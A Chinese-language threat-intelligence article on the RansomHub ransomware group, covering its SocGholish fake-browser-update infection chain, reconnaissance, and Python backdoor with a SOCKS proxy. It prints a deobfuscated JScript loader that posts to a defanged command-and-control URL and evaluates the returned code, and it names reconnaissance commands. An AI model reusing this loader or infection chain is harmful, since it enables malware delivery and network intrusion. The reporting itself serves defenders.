网络犯罪生态系统中出现了一个名为 RansomHub 的新型勒索软件即服务 (RaaS) 组织，专门通过复杂的攻击媒介针对知名组织。

该组织在俄罗斯匿名市场（RAMP）上宣传其犯罪服务，RAMP 是一个臭名昭著的暗网论坛，以举办各种网络犯罪活动而闻名。

RansomHub 通过其多阶段攻击方法和规避技术迅速成为全球企业网络的巨大威胁。

该勒索软件组织通过部署 SocGholish（也称为 FakeUpdates）恶意软件作为初始访问向量来运作，然后在部署基于 python 的后门之前收集详细的系统信息。

这种侦察活动使威胁行为者能够战略性地评估潜在受害者，使他们能够将精力集中在高价值目标上，同时有效地逃避安全研究人员和沙盒环境。

Esentire 的威胁响应部门 (TRU)在 2025 年 3 月初使用此方法发现了一次重大网络攻击。

研究人员指出，RansomHub 附属机构在最初的攻击后会策略性地选择目标，从第一次接触命令和控制服务器到交付 Python 后门大约间隔 6.5 分钟。

感染链

感染链始于受害者访问受感染的 WordPress 网站，该网站会显示一个页面，指示受害者更新浏览器。

下载恶意“Update.zip”文件后，用户会在不知不觉中执行 SocGholish JScript 文件，从而启动与攻击者的命令和控制基础设施的通信。

感染机制采用复杂的多阶段方法，其中每个组件在攻击链中都有特定的用途。

初始访问发生在受害者访问受感染网站（在记录的案例中为“butterflywonderland[.]com”）并被提示更新 Microsoft Edge 时。

下载的“Update.zip”包含“Update.js”，这是一个JScript文件，它向“hxxps://exclusive.nobogoods[.]com/updateStatus”的 SocGholish C2 服务器发送 POST 请求，以检索攻击的下一阶段。

初始阶段的反混淆代码揭示了恶意软件如何建立持久性：

var a0_0x11d8eb = new ActiveXObject("MSXML2.XMLHTTP");a0_0x11d8eb.open("POST", "https://exclusive.nobogoods[.]com/profileLayout", true);a0_0x11d8eb.send("m29Q00a/f6CPLnKzgumo/nA1jnhP0S5dlEw1uB21Cw==");while (true) {    WSH.Sleep(0x3e8);    if (a0_0x11d8eb.readyState == 0x4) {        eval(a0_0x11d8eb.responseText);        break;    }}

收集系统信息后，恶意软件会执行“net use”和“systeminfo”等 LOLBin 命令来收集有关受感染环境的更多情报。

收集到的数据经过编码并传回命令和控制服务器，然后确定受害者是否是有价值的目标。

对于选定的目标，攻击者会部署一个 python 后门，建立SOCKS 代理，允许威胁行为者在受害者的整个网络中进行侦察和横向移动。